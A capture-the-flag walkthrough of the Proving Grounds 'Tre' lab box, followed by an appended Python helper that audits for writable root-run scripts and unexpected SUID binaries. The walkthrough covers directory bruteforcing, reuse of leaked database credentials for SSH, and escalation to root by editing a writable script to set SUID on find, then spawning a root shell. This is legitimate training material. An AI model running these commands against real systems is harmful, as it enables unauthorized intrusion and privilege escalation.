Proving Grounds Play: Tre

RATING

Intermediate

ENUMERATION

First, we kick it off with our usual nmap scan for these types of boxes:

Command: nmap -sV -sC -T4 -Pn -p- 192.168.163.84

Navigating over to the target in our browser doesn’t show us anything too interesting, so we proceed with a directory bruteforce using feroxbuster and find an interesting file at http://192.168.163.84/mantisbt/config/a.txt:

Command: feroxbuster -u http://192.168.163.84/ -w /usr/share/wordlists/dirb/big.txt -k --quiet -s 200

Navigating to this URL in our browser, we see some database config details:

Since we currently have nowhere to use these config details, we keep bruteforcing with feroxbuster, but this time we filter for php extensions:

Command: feroxbuster -u http://192.168.163.84/ -w /usr/share/wordlists/dirb/big.txt -k --quiet -s 200 -x .php

EXPLOITATION

Navigating over to http://192.168.163.84/adminer.php, we see a login page where we can use the previously found details:

After logging in, we search for "user" and find mantis_user_table, which contains the data for user tre:

Since we know this box has port 22 open, we use these details to SSH as user tre:

PRIVILEGE ESCALATION

Running sudo -l, we see that tre has permission to run /sbin/shutdown as root:

After transferring over and running linpeas.sh on this box, we see that the file /usr/bin/check-system is writable by us:

Command: python3 -m http.server 80 (on attacker machine)

Command: wget http://192.168.45.205/linpeas.sh (on target)

We edit this file to include chmod +s /usr/bin/find to add the SUID bit to this binary (other binaries can be used here):

Since user tre has permission to run shutdown as root, we use this to reboot the box:

Command: sudo shutdown -r now

After the reboot and logging back in, we now have find with the SUID bit and can proceed to use GTFOBins to elevate privileges to root and read our flag:

Command: find . -exec /bin/sh -p \; -quit
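The escalation chain above rests on two host misconfigurations a defender can audit for: a root-executed script that an unprivileged user can write (like /usr/bin/check-system here) and a SUID bit appearing on a binary that should not carry one (find after the chmod +s). The following is an added audit helper, not part of the original write-up; the directory layout, file names and the expected-SUID baseline are constructed assumptions for illustration.

```python
import os
import shutil
import stat
import tempfile
from typing import Dict, List, Set


def writable_by_others(mode: int) -> bool:
    """True if the group or world write bit is set: a root-run script with this
    mode can be edited by a normal user, which is what made check-system dangerous."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_directory(path: str, expected_suid: Set[str]) -> Dict[str, List[str]]:
    """Walk a directory and report files writable by non-owners, and SUID files
    whose base name is not in the expected baseline (e.g. passwd, sudo)."""
    findings: Dict[str, List[str]] = {"writable": [], "unexpected_suid": []}
    for root, _dirs, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            try:
                st = os.lstat(full)  # lstat: do not follow symlinks into other trees
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode):
                continue
            if writable_by_others(st.st_mode):
                findings["writable"].append(full)
            if st.st_mode & stat.S_ISUID and name not in expected_suid:
                findings["unexpected_suid"].append(full)
    return findings


def demo() -> Dict[str, List[str]]:
    """Constructed mini 'bin' directory mirroring the box's state after the edit:
    a world-writable check-system, a SUID find, plus two benign files."""
    base = tempfile.mkdtemp()
    layout = {"check-system": 0o777, "find": 0o4755, "passwd": 0o4755, "ls": 0o755}
    try:
        for name, mode in layout.items():
            full = os.path.join(base, name)
            with open(full, "w") as fh:
                fh.write("#!/bin/sh\n")  # placeholder content, constructed
            os.chmod(full, mode)
        raw = audit_directory(base, expected_suid={"passwd", "sudo", "su"})
        # Report base names so the result does not depend on the temp path.
        return {k: sorted(os.path.basename(p) for p in v) for k, v in raw.items()}
    finally:
        shutil.rmtree(base, ignore_errors=True)
```

Run against real paths such as /usr/bin and /sbin with a baseline taken from a clean install; check-system would surface under "writable" before the reboot, and find under "unexpected_suid" after it.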